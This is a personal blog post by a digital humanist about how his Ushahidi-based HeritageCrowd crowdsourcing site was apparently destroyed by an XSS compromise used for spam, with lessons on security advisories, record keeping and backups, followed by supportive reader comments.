How I Lost the Crowd: A Tale of Sorrow and Hope

Yesterday, my HeritageCrowd project website was annihilated. Gone. Kaput. Destroyed. Joined the choir.

It is a dead parrot.

This is what I think happened, what I now know and need to learn, and what I think the wider digital humanities community needs to think about/teach each other.

HeritageCrowd was (may be again, if I can salvage from the wreckage) a project that tried to encourage the crowdsourcing of local cultural heritage knowledge for a community that does not have particularly good internet access or penetration. It was built on the Ushahidi platform, which allows folks to participate via cell phone text messages. We even had it set up so that a person could leave a voice message and software would automatically transcribe the message and submit it via email. It worked fairly well, and we wrote it up for Writing History in the Digital Age. I was looking forward to working more on it this summer.

Problem #1: Poor record keeping of the process of getting things intalled, and the decisions taken.

Now, originally, we were using the Crowdmap hosted version of Ushahidi, so we wouldn’t have to worry about things like security, updates, servers, that sort of thing. But… I wanted to customize the look, move the blocks around, and make some other cosmetic changes so that Ushahidi’s genesis in crisis-mapping wouldn’t be quite as evident. When you repurpose software meant for one domain to another, it’s the sort of thing you do. So, I set up a new domain, got some server space, downloaded Ushahidi and installed it. The installation tested my server skills. Unlike setting up WordPress or Omeka (which I’ve done several times), Ushahidi requires the concommitant set up of ‘Kohana‘. This was not easy. There are many levels of tacit knowledge in computing and especially in web-based applications that I, as an outsider, have not yet learned. It takes a lot of trial and error, and sometimes, just dumb luck. I kept poor records of this period – I was working to a tight deadline, and I wanted to just get the damned thing working. Today, I have no idea what I actually did to get Kohana and Ushahidi playing nice with one another. I think it actually boiled down to file structure.

(It’s funny to think of myself as an outsider, when it comes to all this digital work. I am after all an official, card-carrying ‘digital humanist’. It’s worth remembering what that label actually means. At least one part of it is ‘humanist’. I spent well over a decade learning how to do that part. I’ve only been at the ‘digital’ part since about 2005… and my experience of ‘digital’, at least initially, is in social networks and simulation – things that don’t actually require me to mount materials on the internet. We forget sometimes that there’s more to the digital humanities than building flashy internet-based digital tools. Archaeologists have been using digital methods in their research since the 1960s; Classicists at least that long – and of course Father Busa).

Problem #2: Computers talk to other computers, and persuade them to do things.

I forget where I read it now (it was probably Stephen Ramsay or Geoffrey Rockwell), but digital humanists need to consider artificial intelligence. We do a humanities not just of other humans, but of humans’ creations that engage in their own goal-directed behaviours. As some one who has built a number of agent based models and simulations, I suppose I shouldn’t have forgotten this. But on the internet, there is a whole netherworld of computers corrupting and enslaving each other, for all sorts of purposes.

HeritageCrowd was destroyed so that one computer could persuade another computer to send spam to gullible humans with erectile dsyfunction.

It seems that Ushahidi was vulnerable to ‘Cross-site Request Forgery‘ and ‘Cross-site Scripting‘ attacks. I think what happened to HeritageCrowd was an instance of persistent XSS:

The persistent (or stored) XSS vulnerability is a more devastating variant of a cross-site scripting flaw: it occurs when the data provided by the attacker is saved by the server, and then permanently displayed on “normal” pages returned to other users in the course of regular browsing, without proper HTML escaping.

When I examine every php file on the site, there are all sorts of injected base64 code. So this is what killed my site. Once my site started flooding spam all over the place, the internet’s immune systems (my host’s own, and others), shut it all down. Now, I could just clean everything out, and reinstall, but the more devastating issue: it appears my sql database is gone. Destroyed. Erased. No longer present. I’ve asked my host to help confirm that, because at this point, I’m way out of my league. Hey all you lone digital humanists: how often does your computing services department help you out in this regard? Find someone at your institution who can handle this kind of thing. We can’t wear every hat. I’ve been a one-man band for so long, I’m a bit like the guy in Shawshank Redemption who asks his boss at the supermarket for permission to go to the bathroom. Old habits are hard to break.

Problem #3: Security Warnings

There are many Ushahidi installations all over the world, and they deal with some pretty sensitive stuff. Security is therefore something Ushahidi takes seriously. I should’ve too. I was not subscribed to the Ushahidi Security Advisories. The hardest pill to swallow is when you know it’s your own damned fault. The warning was there; heed the warnings! Schedule time into every week to keep on top of security. If you’ve got a team, task someone to look after this. I have lots of excuses – it was end of term, things were due, meetings to be held, grades to get in – but it was my responsibility. And I dropped the ball.

Problem #4: Backups

This is the most embarrasing to admit. I did not back things up regularly. I am not ever making that mistake again. Over on Looted Heritage, I have an IFTTT recipe set up that sends every new report to BufferApp, which then tweets it. I’ve also got one that sends every report to Evernote. There are probably more elegant ways to do this. But the worst would be to remind myself to manually download things. That didn’t work the first time. It ain’t gonna work the next.

So what do I do now?

If I can get my database back, I’ll clean everything out and reinstall, and then progress onwards wiser for the experience. If I can’t… well, perhaps that’s the end of HeritageCrowd. It was always an experiment, and as Scott Weingart reminds us,

The best we can do is not as much as we can, but as much as we need. There is a point of diminishing return for data collection; that point at which you can’t measure the coastline fast enough before the tides change it. We as humanists have to become comfortable with incompleteness and imperfection, and trust that in aggregate those data can still tell us something, even if they can’t reveal everything.

The HeritageCrowd project taught me quite a lot about crowdsourcing cultural heritage, about building communities, about the problems, potentials, and perils of data management. Even in its (quite probable) death, I’ve learned some hard lessons. I share them here so that you don’t have to make the same mistakes. Make new ones! Share them! The next time I go to THATCamp, I know what I’ll be proposing. I want a session on the Black Hats, and the dark side of the force. I want to know what the resources are for learning how they work, what I can do to protect myself, and frankly, more about the social and cultural anthropology of their world. Perhaps there is space in the Digital Humanities for that.

PS.

When I discovered what had happened, I tweeted about it. Thank you everyone who responded with help and advice. That’s the final lesson I think, about this episode. Don’t be afraid to share your failures, and ask for help. As Bethany wrote some time ago, we’re at that point where we’re building the new ways of knowing for the future, just like the Lunaticks in the 18th century. Embrace your inner Lunatick:

Those 18th-century Lunaticks weren’t about the really big theories and breakthroughs – instead, their heroic work was to codify knowledge, found professional societies and journals, and build all the enabling infrastructure that benefited a succeeding generation of scholars and scientists.

[...]

if you agree with me that there’s something remarkable about a generation of trained scholars ready to subsume themselves in collaborative endeavors, to do the grunt work, and to step back from the podium into roles only they can play – that is, to become systems-builders for the humanities — then we might also just pause to appreciate and celebrate, and to use “#alt-ac” as a safe place for people to say, “I’m a Lunatick, too.”

Perhaps my role is to fail gloriously & often, so you don’t have to. I’m ok with that.

About these ads

18 thoughts on “How I Lost the Crowd: A Tale of Sorrow and Hope

  1. While it’s absolutely terrible that this happened, this post almost makes it worth it (to the rest of us, at least, somehow for you I think not). As these kinds of projects become more popular, they become more attractive targets for hacking (problematic word, I know, how about “More hack, less hacking?”). I hope you get everything back together.

    • Thanks Elijah! As I look at the database, it looks more or less uncorrupted, so perhaps we’ll be back in business soon.

  2. Shawn, I’m sorry to hear that you’re going through this hassle, but you can count me (someone who should know better!) among those of your readers who were reminded by this to put Something Pretty Important under version control. So, thanks, from one Lunatick to another. I greatly admire the way you have turned a set-back into a positive set of lessons for the broader community. Here’s hoping that HeritageCrowd is “not dead yet.”

    • Thank you Bethany. Some hard lessons, but *next* time… right? :) Version control is something else I need to get to grips with too. So many things to learn!

    • Hi Heather,
      Thank you – I’ve been in touch with one of your developers, so hopefully everything will be back up and running before too much longer.

  3. I’m sorry to hear about your loss, especially considering that the article in Writing History in the Digital Age is helping inform my own MRP work. I hope HeritageCrowd is brought back to life because it is a fantastic idea that is inspiring other projects. “Gentlemen, we can rebuild him. We have the technology.”

    • Hi Robertss87 – thank you. And thank you for the 6 million dollar man reference! I’m glad the case study was helpful for your own work. That’s what it’s all about, right? Looks like my database survived mostly unscathed, so I’m using this time to think carefully about what I want HeritageCrowd 2.0 to do/accomplish/be.

  4. Pingback: A Digital Archaeology Day » Day of Archaeology

  5. Pingback: Digital Humanist Interview « Electric Archaeology

  6. Pingback: Thinking out loud: language re tenure guidelines for the Digital Historian « Electric Archaeology

  7. Pingback: Let’s Talk About Failure – The Shared Experiences | Adventures in Archaeology, Human Palaeoecology and the Internet

  8. Pingback: In Principio Erat | #hist5702x

  9. Pingback: Open Call: The Shortcomings of Crowdsourcing Digital History | Crowdsourcing Digital History

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s